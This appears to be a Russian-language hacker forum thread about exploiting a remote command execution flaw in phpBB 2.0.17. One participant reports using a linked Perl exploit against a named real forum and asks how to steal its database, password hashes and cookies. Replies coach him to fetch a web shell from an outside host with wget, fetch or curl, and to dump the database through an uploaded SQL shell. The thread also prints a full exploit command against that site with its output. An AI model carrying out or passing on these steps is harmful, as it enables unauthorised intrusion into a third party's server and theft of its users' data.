Форумы phpBB <= 2.0.17

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"


Я использовал эту уязвимость на форуме http://www.abbadon.ru/f/ вроде все получилось.
У меня вопрос можно ли какой нить командой узнать хеш пользователя, или слить базу, и возможно еще залить shell? объясните плиз.

 

так этож уязвимость представляет собой php injection
так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
не в тему но всеже скажу
хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности мля
кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.

 

какой командой можно базу слить?
или шел залить

может я просто не так делаю не ругайтесь


C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

или это делается пл другому?

 

А команда простая wget http://путь_к шелу.
И он зальётся.

 

C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

 

попробуй без сплоита делать тогда быстрее во всем разберешся

 

какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.

 

А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.

 

вот здесь
http://www.hardened-php.net/advisory_172005.75.html
первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
includes/usercp_register.php

 

эффект тот же ни чего не происходит как будто что то не так делаю

 

ссылки не вижу ? И в это файле вот что "Hacking attempt"

Загадками говориш )

 

ребята я просто хочу чтоб вы не пользовались тупо сплоитами, а и головой думали
я исправил немного скрипт чтоб сплоит рст там не пахал

 

Так сплойт только для 5 пхп вроде или я ошибаюсь ?

 

Ну у меня тогда такой вопрос каим образом можно базу слить?
И можно ли е слить через сплоит из командной стоки Windows

 

Нужно sql клиент(шел) залить конечно пароли к БД и dump сделаеш.

А база там не меньше 500МБ сможеш слить,а и зачем тебе.

 

Стукни мне 323945339

 

Ну у кого нить хоть получится сделать http://www.abbadon.ru/f/

Я никак не могу в командах разобраься и цпуе пробовал и др шелл никак не могу залить может я что то не так делаю, подскажите.

 

Именно то, что тебе надо проще всего в этой версии через хсс реализовать... А чем кстати тебе этот форум не угодил, что ты сразу две темы про него создал? Если не секрет конечно. )

 

Я его версию не знаю? вот тоже в чем проблема.

 

когда shell запускаю из CMD команда ls и некоторые другие работают файлы показывают . А вот какая команда и как ее правильно писать чтобы шелл залить не знаю. И как слить базу тоже не занаю. Хеш нужен тоже но Xss не подходит. Вот и прошу подсказать как правильно команды написать.